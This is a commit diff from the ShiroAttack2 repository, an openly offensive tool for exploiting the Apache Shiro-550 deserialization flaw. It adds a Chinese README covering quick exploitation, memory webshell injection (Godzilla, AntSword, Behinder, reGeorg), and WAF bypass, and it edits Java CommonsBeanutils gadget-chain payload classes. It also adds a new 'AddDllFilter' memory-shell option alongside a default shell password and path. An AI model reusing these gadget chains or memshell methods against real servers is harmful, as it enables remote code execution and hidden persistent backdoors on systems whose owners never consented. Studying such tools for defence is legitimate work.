SummerSec
diff --git a/‎.idea/$PROJECT_FILE$
-11 b/‎.idea/$PROJECT_FILE$
-11
diff --git a/‎.idea/misc.xml
+5-9 b/‎.idea/misc.xml
+5-9
diff --git a/‎.idea/qaplug_profiles.xml
-465 b/‎.idea/qaplug_profiles.xml
-465
diff --git a/‎.idea/serialmonitor_settings.xml
-4 b/‎.idea/serialmonitor_settings.xml
-4
diff --git a/‎README.md
+1-1 b/‎README.md
+1-1
diff --git a/‎docs/BypassWaf.md b/‎docs/BypassWaf.md
diff --git a/‎FAQ.md ‎docs/FAQ.md b/‎FAQ.md ‎docs/FAQ.md
diff --git a/‎docs/NoGadget.md b/‎docs/NoGadget.md
diff --git a/‎docs/README.md
+60 b/‎docs/README.md
+60
diff --git a/‎docs/memshell.md
+1 b/‎docs/memshell.md
+1
diff --git a/‎pom.xml
+1-1 b/‎pom.xml
+1-1
diff --git a/‎src/main/java/com/summersec/attack/UI/Main.java
+1-1 b/‎src/main/java/com/summersec/attack/UI/Main.java
+1-1
diff --git a/‎src/main/java/com/summersec/attack/UI/MainController.java
+1-1 b/‎src/main/java/com/summersec/attack/UI/MainController.java
+1-1
diff --git a/‎src/main/java/com/summersec/attack/deser/payloads/CommonsBeanutilsAttrCompare.java
-4 b/‎src/main/java/com/summersec/attack/deser/payloads/CommonsBeanutilsAttrCompare.java
-4
diff --git a/‎src/main/java/com/summersec/attack/deser/payloads/CommonsBeanutilsAttrCompare_192.java
+1-3 b/‎src/main/java/com/summersec/attack/deser/payloads/CommonsBeanutilsAttrCompare_192.java
+1-3
diff --git a/‎src/main/java/com/summersec/attack/deser/payloads/CommonsBeanutilsPropertySource.java
+1-8 b/‎src/main/java/com/summersec/attack/deser/payloads/CommonsBeanutilsPropertySource.java
+1-8
diff --git a/‎src/main/java/com/summersec/attack/deser/payloads/CommonsBeanutilsPropertySource_192.java
+1-8 b/‎src/main/java/com/summersec/attack/deser/payloads/CommonsBeanutilsPropertySource_192.java
+1-8
@@ -38,7 +38,7 @@
 
 ## FAQ 常见问题见
 
-[FAQ](./FAQ.md)
+[FAQ](https://shiro.sumsec.me/)
 
 
 
 
@@ -0,0 +1,60 @@
+# shiro550反序列化漏洞利用工具
+
+<h1 align="center" >ShiroAttack2</h1>
+<h3 align="center" >一款针对Shiro550漏洞进行快速漏洞利用</h3>
+ <p align="center">
+    <a href="https://github.com/SummerSec/ShiroAttack2"></a>
+    <a href="https://github.com/SummerSec/ShiroAttack2"><img alt="ShiroAttack2" src="https://img.shields.io/badge/ShiroAttack2-green"></a>
+    <a href="https://github.com/SummerSec/ShiroAttack2"><img alt="Forks" src="https://img.shields.io/github/forks/SummerSec/ShiroAttack2"></a>
+     <a href="https://github.com/SummerSec/ShiroAttack2"><img alt="Release" src="https://img.shields.io/github/release/SummerSec/ShiroAttack2.svg"></a>
+  <a href="https://github.com/SummerSec/ShiroAttack2"><img alt="Stars" src="https://img.shields.io/github/stars/SummerSec/ShiroAttack2.svg?style=social&label=Stars"></a>
+     <a href="https://github.com/SummerSec"><img alt="Follower" src="https://img.shields.io/github/followers/SummerSec.svg?style=social&label=Follow"></a>
+     <a href="https://github.com/SummerSec"><img alt="Visitor" src="https://visitor-badge.laobi.icu/badge?page_id=SummerSec.ShiroAttack2"></a>
+    <a href="https://shiro.sumsec.me/"><img alt="ShiroDocs" src="https://img.shields.io/badge/ShiroDocs-green"></a>
+	<a href="https://twitter.com/SecSummers"><img alt="SecSummers" src="https://img.shields.io/twitter/follow/SecSummers.svg"></a>
+	<a xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://visitor-badge.laobi.icu"><rect fill="rgba(0,0,0,0)" height="20" width="49.6"/></a>
+	<a xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://visitor-badge.laobi.icu"><rect fill="rgba(0,0,0,0)" height="20" width="17.0" x="49.6"/></a>
+	</p>
+
+
+---
+## 使用方法
+
+直接使用shiro_attack-{version}-SNAPSHOT-all.jar第三版
+
+![image-20211130114603322](https://cdn.jsdelivr.net/gh/SummerSec/Images//49u5049ec49u5049ec.png)
+
+在jar的当前目录下创建一个data文件夹，里面创建一个shiro_keys.txt文件，文件内容是shiro_key。lib目前是CommonsBeanutils依赖的版本。
+
+![image-20211130113559530](https://cdn.jsdelivr.net/gh/SummerSec/Images//44u5044ec44u5044ec.png)
+
+特殊shiro漏洞打法：
+
+* 关于内存马模块的使用方法，请参考内存马模块的使用方法。
+   [MemShell](./memshell.md)
+* 关于有key无链漏洞的使用方法，请参考无key漏洞的使用方法。
+   [NoGadget](./NoGadget.md)
+* 关于bypass waf方法，请参考bypass waf方法。
+   [BypassWaf](./BypassWaf.md)
+
+
+## FAQ 常见问题见
+
+[FAQ](./docs/FAQ.md)
+
+
+
+---
+## :b:免责声明
+
+该工具仅用于安全自查检测
+
+由于传播、利用此工具所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。
+
+本人拥有对此工具的修改和解释权。未经网络安全部门及相关部门允许，不得善自使用本工具进行任何攻击活动，不得以任何方式将其用于商业目的。
+
+该工具只授权于企业内部进行问题排查，请勿用于非法用途，请遵守网络安全法，否则后果作者概不负责
+
+----
+
+![as](https://starchart.cc/SummerSec/ShiroAttack2.svg)
@@ -0,0 +1 @@
+#
@@ -6,7 +6,7 @@
 
     <groupId>org.example</groupId>
     <artifactId>shiro_attack</artifactId>
-    <version>4.5-SNAPSHOT</version>
+    <version>4.5.1-SNAPSHOT</version>
     <build>
         <plugins>
             <plugin>
 
@@ -15,7 +15,7 @@ public Main() {
     @Override
     public void start(Stage primaryStage) throws Exception {
         Parent root = FXMLLoader.load(getClass().getResource("/gui.fxml"));
-        primaryStage.setTitle("shiro反序列化漏洞综合利用工具 增强版 SummerSec @ by3");
+        primaryStage.setTitle("shiro反序列化漏洞综合利用工具 增强版 SummerSec & by3");
         Scene scene = new Scene(root);
         primaryStage.setScene(scene);
         primaryStage.show();
 
@@ -243,7 +243,7 @@ public void initComBoBox() {
         this.echoOpt.setItems(echoes);
         this.shellPassText.setText("pass1024");
         this.shellPathText.setText("/favicondemo.ico");
-        final ObservableList<String> memShells = FXCollections.observableArrayList(new String[]{"哥斯拉[Filter]", "蚁剑[Filter]", "冰蝎[Filter]", "NeoreGeorg[Filter]", "reGeorg[Filter]", "哥斯拉[Servlet]", "蚁剑[Servlet]", "冰蝎[Servlet]", "NeoreGeorg[Servlet]", "reGeorg[Servlet]", "ChangeShiroKey[Filter]", "ChangeShiroKey[Filter2]", "BastionFilter", "BastionEncryFilter"});
+        final ObservableList<String> memShells = FXCollections.observableArrayList(new String[]{"哥斯拉[Filter]", "蚁剑[Filter]", "冰蝎[Filter]", "NeoreGeorg[Filter]", "reGeorg[Filter]", "哥斯拉[Servlet]", "蚁剑[Servlet]", "冰蝎[Servlet]", "NeoreGeorg[Servlet]", "reGeorg[Servlet]", "ChangeShiroKey[Filter]", "ChangeShiroKey[Filter2]", "BastionFilter", "BastionEncryFilter", "AddDllFilter"});
 //        final ObservableList<String> memShells = FXCollections.observableArrayList(new String[]{"哥斯拉[Servlet]", "冰蝎[Servlet]", "蚁剑[Servlet]", "NeoreGeorg[Servlet]", "reGeorg[Servlet]"});
         this.memShellOpt.setPromptText("冰蝎[Filter]");
         this.memShellOpt.setValue("冰蝎[Filter]");
 
@@ -22,10 +22,6 @@ public class CommonsBeanutilsAttrCompare implements ObjectPayload<Queue<Object>>
     public Queue<Object> getObject(Object template) throws Exception {
 
         AttrNSImpl attrNS1 = new AttrNSImpl();
-        CoreDocumentImpl coreDocument = new CoreDocumentImpl();
-        attrNS1.setValues(coreDocument,"1","1","1");
-
-
 
         BeanComparator beanComparator = new BeanComparator(null, new AttrCompare());
 
 
@@ -24,13 +24,11 @@ public class CommonsBeanutilsAttrCompare_192 implements ObjectPayload<Queue<Obje
     public Queue<Object> getObject(Object template) throws Exception {
 
         AttrNSImpl attrNS1 = new AttrNSImpl();
-        CoreDocumentImpl coreDocument = new CoreDocumentImpl();
-        attrNS1.setValues(coreDocument,"1","1","1");
         StandardExecutorClassLoader classLoader = new StandardExecutorClassLoader("1.9.2");
         Class u = classLoader.loadClass("org.apache.commons.beanutils.BeanComparator");
         System.out.println(u.getPackage());
 
-//        BeanComparator beanComparator = new BeanComparator(null, new AttrCompare());
+
         Object beanComparator = u.getDeclaredConstructor(String.class, Comparator.class).newInstance(null, new AttrCompare());
 
 //        PriorityQueue<Object> queue = new PriorityQueue<Object>(2, (Comparator<?>) beanComparator);
 
@@ -24,20 +24,13 @@ public int getPriority() {
             }
 
         };
-        PropertySource propertySource2 = new PropertySource() {
 
-            @Override
-            public int getPriority() {
-                return 0;
-            }
-
-        };
         BeanComparator beanComparator = new BeanComparator(null, new PropertySource.Comparator());
 
         PriorityQueue<Object> queue = new PriorityQueue<Object>(2, beanComparator);
 
         queue.add(propertySource1);
-        queue.add(propertySource2);
+        queue.add(propertySource1);
 
 
         Reflections.setFieldValue(queue, "queue", new Object[] { template, template });
 
@@ -26,14 +26,7 @@ public int getPriority() {
             }
 
         };
-        PropertySource propertySource2 = new PropertySource() {
 
-            @Override
-            public int getPriority() {
-                return 0;
-            }
-
-        };
 //        BeanComparator beanComparator = new BeanComparator(null, new PropertySource.Comparator());
         StandardExecutorClassLoader classLoader = new StandardExecutorClassLoader("1.9.2");
         Class u = classLoader.loadClass("org.apache.commons.beanutils.BeanComparator");
@@ -47,7 +40,7 @@ public int getPriority() {
         PriorityQueue<Object> queue = new PriorityQueue<Object>(2, (Comparator<? super Object>) beanComparator);
 
         queue.add(propertySource1);
-        queue.add(propertySource2);
+        queue.add(propertySource1);
 
 
         Reflections.setFieldValue(queue, "queue", new Object[] { template, template });
Original file line number	Diff line number	Diff line change
`@@ -38,7 +38,7 @@`
`38`	`38`
`39`	`39`	`## FAQ 常见问题见`
`40`	`40`
`41`		`-[FAQ](./FAQ.md)`
	`41`	`+[FAQ](https://shiro.sumsec.me/)`
`42`	`42`
`43`	`43`
`44`	`44`